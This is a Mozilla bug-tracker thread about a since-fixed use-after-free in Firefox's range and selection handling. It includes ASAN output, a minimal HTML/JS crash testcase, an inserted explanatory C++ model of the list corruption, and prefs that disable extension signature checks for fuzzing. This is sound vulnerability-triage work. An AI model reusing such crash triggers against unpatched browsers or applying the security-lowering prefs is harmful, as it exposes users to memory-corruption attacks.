=>0x0c2080005fc0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd[fd]
  0x0c2080005fd0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c2080005fe0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c2080005ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2080006000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c2080006010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==23032==ABORTING
Attached file ASAN output
Attached file crash.html
Group: core-security → dom-core-security
Is this the recent regression which is/was being fixed in some other bug?
Olli is thinking of bug 1396520. That was merged to mozilla-central on the same day as the buildid listed in comment 0, so I don't know whether the buildid from comment 0 has that fix. What is the actual revision the build from comment 0 is built from (see about:buildconfig)? That said, the fix for bug 1396520 should have fixed a null-deref, not a UAF. This bug is making it sound like "range" is UAF, which is why its IsInSelection() might be bogus... I'll try to reproduce this locally.
Flags: needinfo?(bzbarsky)
Hrm. Where do I get a current copy of the fuzzpriv extension? The one at https://www.squarefree.com/extensions/domFuzzLite3.xpi claims to not be compatible with nightly...
Flags: needinfo?(nils)
[Tracking Requested - why for this release]:

I _think_ I found the right extension. I also built an ASAN debug build, because I wasn't succeeding at reproducing. But I don't even get to the ASAN bits; I fail an assertion like so:

Assertion failure: !aSelection || !mSelection, at /home/bzbarsky/mozilla/inbound/mozilla/dom/base/nsRange.cpp:1055

If that assertion fails, bad things will happen that used to not happen before the fix for bug 1395701. In particular, if this assertion fails that means we are already registered with our common ancestor (because mSelection is non-null). Now we will RegisterCommonAncestor _again_ with the same ancestor. What that used to do was re-add us to the hashset on the common ancestor, which was a no-op. But now it will try to add us to the linked list twice. What that means is that other things in the list will have pointers to us, but we won't have pointers back to them anymore. Then when we are removed from the selection we will remove ourselves from the list, but those dangling pointers will remain. And if we are now destroyed, they become UAF.
Blocks: 1395701
Has Regression Range: --- → yes
Keywords: regression
Assignee: nobody → bzbarsky
Flags: needinfo?(bzbarsky)
FYI, Cătălin is working on a similar crash in bug 1399091.
So for what it's worth, the claimed invariant simply fails to hold, as far as I can tell, if one adds the same range to two different selections. But yes, the patches in bug 1399091 are along the lines of what I was thinking as far as a fix here.
Depends on: 1399091
Pretty minimal testcase that reproduces the assert, avoiding the checks we have to theoretically prevent this:

<iframe></iframe>
<script>
onload = function() {
  var range = document.createRange();
  range.selectNodeContents(document.documentElement);
  var sel1 = getSelection();
  sel1.addRange(range);
  range.selectNodeContents(frames[0].document.documentElement);
  var sel2 = frames[0].getSelection();
  sel2.addRange(range);
}
</script>
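The failure mode described in comment 7 (an nsRange registered with its common ancestor's linked list a second time, then unlinked and freed) and the two-selection testcase above, reduced to a stand-alone model. This is an added example written for this page, not Gecko code: `Elem`/`List` are a simplified stand-in for `mozilla::LinkedList`, the `check` flag stands in for the `!aSelection || !mSelection` invariant, and the scenario, field names and counts are assumptions chosen to make the corruption observable without touching freed memory.

```cpp
// Added example (not Gecko code): a minimal intrusive, sentinel-based
// doubly-linked list modelled loosely on mozilla::LinkedList. It shows the
// hazard from comment 7: linking an element that is already linked, then
// unlinking and freeing it, leaves its neighbours pointing at freed memory.
// Names, layout and the `check` flag are assumptions for illustration.
#include <cstdint>
#include <cstdio>
#include <initializer_list>
#include <vector>

struct Elem {
  Elem* prev = nullptr;
  Elem* next = nullptr;
  int id;
  explicit Elem(int i) : id(i) {}
  bool isInList() const { return prev != nullptr; }

  // Unlink self by patching the neighbours, then clear own links. If prev and
  // next both point at *this (see insertFront), the patching changes nothing
  // and whatever else still points at us keeps doing so.
  void remove() {
    prev->next = next;
    next->prev = prev;
    prev = next = nullptr;
  }
};

struct List {
  Elem sentinel{0};
  List() { sentinel.prev = sentinel.next = &sentinel; }

  // Insert at the front. With check == false, re-inserting the element that is
  // already first makes it point at itself while its former neighbour keeps
  // pointing at it: others hold pointers to us, we hold none back to them.
  bool insertFront(Elem* e, bool check) {
    if (check && e->isInList()) return false;  // invariant: not yet registered
    e->next = sentinel.next;
    e->prev = &sentinel;
    sentinel.next->prev = e;
    sentinel.next = e;
    return true;
  }
};

// Forward walk from the sentinel: every next->prev must point back, and the
// walk must return to the sentinel within `bound` hops.
static bool consistent(const List& list, int bound) {
  const Elem* e = &list.sentinel;
  for (int i = 0; i < bound; ++i) {
    if (e->next->prev != e) return false;
    e = e->next;
    if (e == &list.sentinel) return true;
  }
  return false;
}

// Count link slots (sentinel plus the given live elements) that still hold the
// address of an element that was unlinked and freed. Addresses are compared as
// integers, so nothing freed is dereferenced here.
static int staleLinksTo(const List& list, const std::vector<Elem*>& live,
                        std::uintptr_t dead) {
  auto addr = [](const Elem* p) { return reinterpret_cast<std::uintptr_t>(p); };
  int n = 0;
  if (addr(list.sentinel.next) == dead) ++n;
  if (addr(list.sentinel.prev) == dead) ++n;
  for (const Elem* e : live) {
    if (addr(e->prev) == dead) ++n;
    if (addr(e->next) == dead) ++n;
  }
  return n;
}

struct Outcome {
  bool secondInsertAccepted;
  bool consistentAfterInserts;
  int staleLinksAfterFree;
};

// Register A, then B, then B again (the second RegisterCommonAncestor from
// comment 7), unlink B and free it. Reports what the list looks like after.
Outcome runScenario(bool checkBeforeInsert) {
  List list;
  Elem a(1);
  Elem* b = new Elem(2);
  list.insertFront(&a, checkBeforeInsert);  // S <-> A
  list.insertFront(b, checkBeforeInsert);   // S <-> B <-> A
  Outcome o{};
  o.secondInsertAccepted = list.insertFront(b, checkBeforeInsert);
  o.consistentAfterInserts = consistent(list, 16);
  const std::uintptr_t bAddr = reinterpret_cast<std::uintptr_t>(b);
  b->remove();
  delete b;  // in Gecko this is the cycle collector freeing the nsRange
  o.staleLinksAfterFree = staleLinksTo(list, {&a}, bAddr);
  return o;
}

int main() {
  for (bool check : {false, true}) {
    Outcome o = runScenario(check);
    std::printf("check=%d accepted=%d consistent=%d stale=%d\n", check,
                o.secondInsertAccepted, o.consistentAfterInserts,
                o.staleLinksAfterFree);
  }
  return 0;
}
```

Without the check, the second insert is accepted, the list is already inconsistent before anything is freed, and after `b` is unlinked and deleted both the sentinel and `a` still hold its address; the next walk from the sentinel (the `getFirst`/`getNext` frames at the top of the ASAN report) reads that freed block. With the check in place, the second insert is refused and unlinking leaves no stale pointer.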
(In reply to Boris Zbarsky [:bz] (still digging out from vacation mail) from comment #5)
> Hrm. Where do I get a current copy of the fuzzpriv extension? The ones at
> https://www.squarefree.com/extensions/domFuzzLite3.xpi claims to not be
> compatible with nightly...

Boris, for future use the fuzzing team maintains a version at the following:
https://github.com/MozillaSecurity/domfuzz/tree/master/dom/extension

It does, however, require special prefs to be loaded. I think the following are sufficient:

user_pref("extensions.allow-non-mpc-extensions", true);
user_pref("extensions.legacy.enabled", true);
user_pref("xpinstall.signatures.required", false);
Thanks!
Flags: needinfo?(nils)
This is fixed on 57/58 now, right?
I just tried reproducing on trunk with a debug ASAN build and the attached testcase, and the assertion in nsRange::SetSelection that was left in place in bug 1399091 still fires. Catalin, Mats, given that we have known testcases that trigger that assertion, should it really be there? Is there a followup on making that assertion hold? That said, I don't have an opt ASAN build on hand; it's possible that in an opt build bug 1399091 does in fact fix this...
Flags: needinfo?(nils)
Actually, I dug up an opt asan build. It does not fail on the testcase in this bug. Then I disabled the code added in bug 1399091 and I get a nice ASAN failure. So yes, this is fixed, for opt builds, by the patches in bug 1399091. Catalin, Mats, I still have the assertion question from comment 13.
Status: NEW → RESOLVED
Closed: 8 years ago
Flags: needinfo?(nils)
Flags: needinfo?(mats)
Flags: needinfo?(catalin.badea392)
Resolution: --- → FIXED
Target Milestone: --- → mozilla58
(In reply to Boris Zbarsky [:bz] (still digging out from vacation mail) from comment #14)
> Actually, I dug up an opt asan build. It does not fail on the testcase in
> this bug. Then I disabled the code added in bug 1399091 and I get a nice
> ASAN failure.
>
> So yes, this is fixed, for opt builds, by the patches in bug 1399091.
>
> Catalin, Mats, I still have the assertion question from comment 13.

That's going to be fixed in bug 1403145. I'll get to it tomorrow.
Flags: needinfo?(mats)
Flags: needinfo?(catalin.badea392)
Group: dom-core-security → core-security-release
Flags: sec-bounty?
Depends on: 1403145
Flags: sec-bounty? → sec-bounty-
Resolution: FIXED → DUPLICATE
Whiteboard: [sec aspect a dupe of 1399091, assertion fixed in 1403145]
Group: core-security-release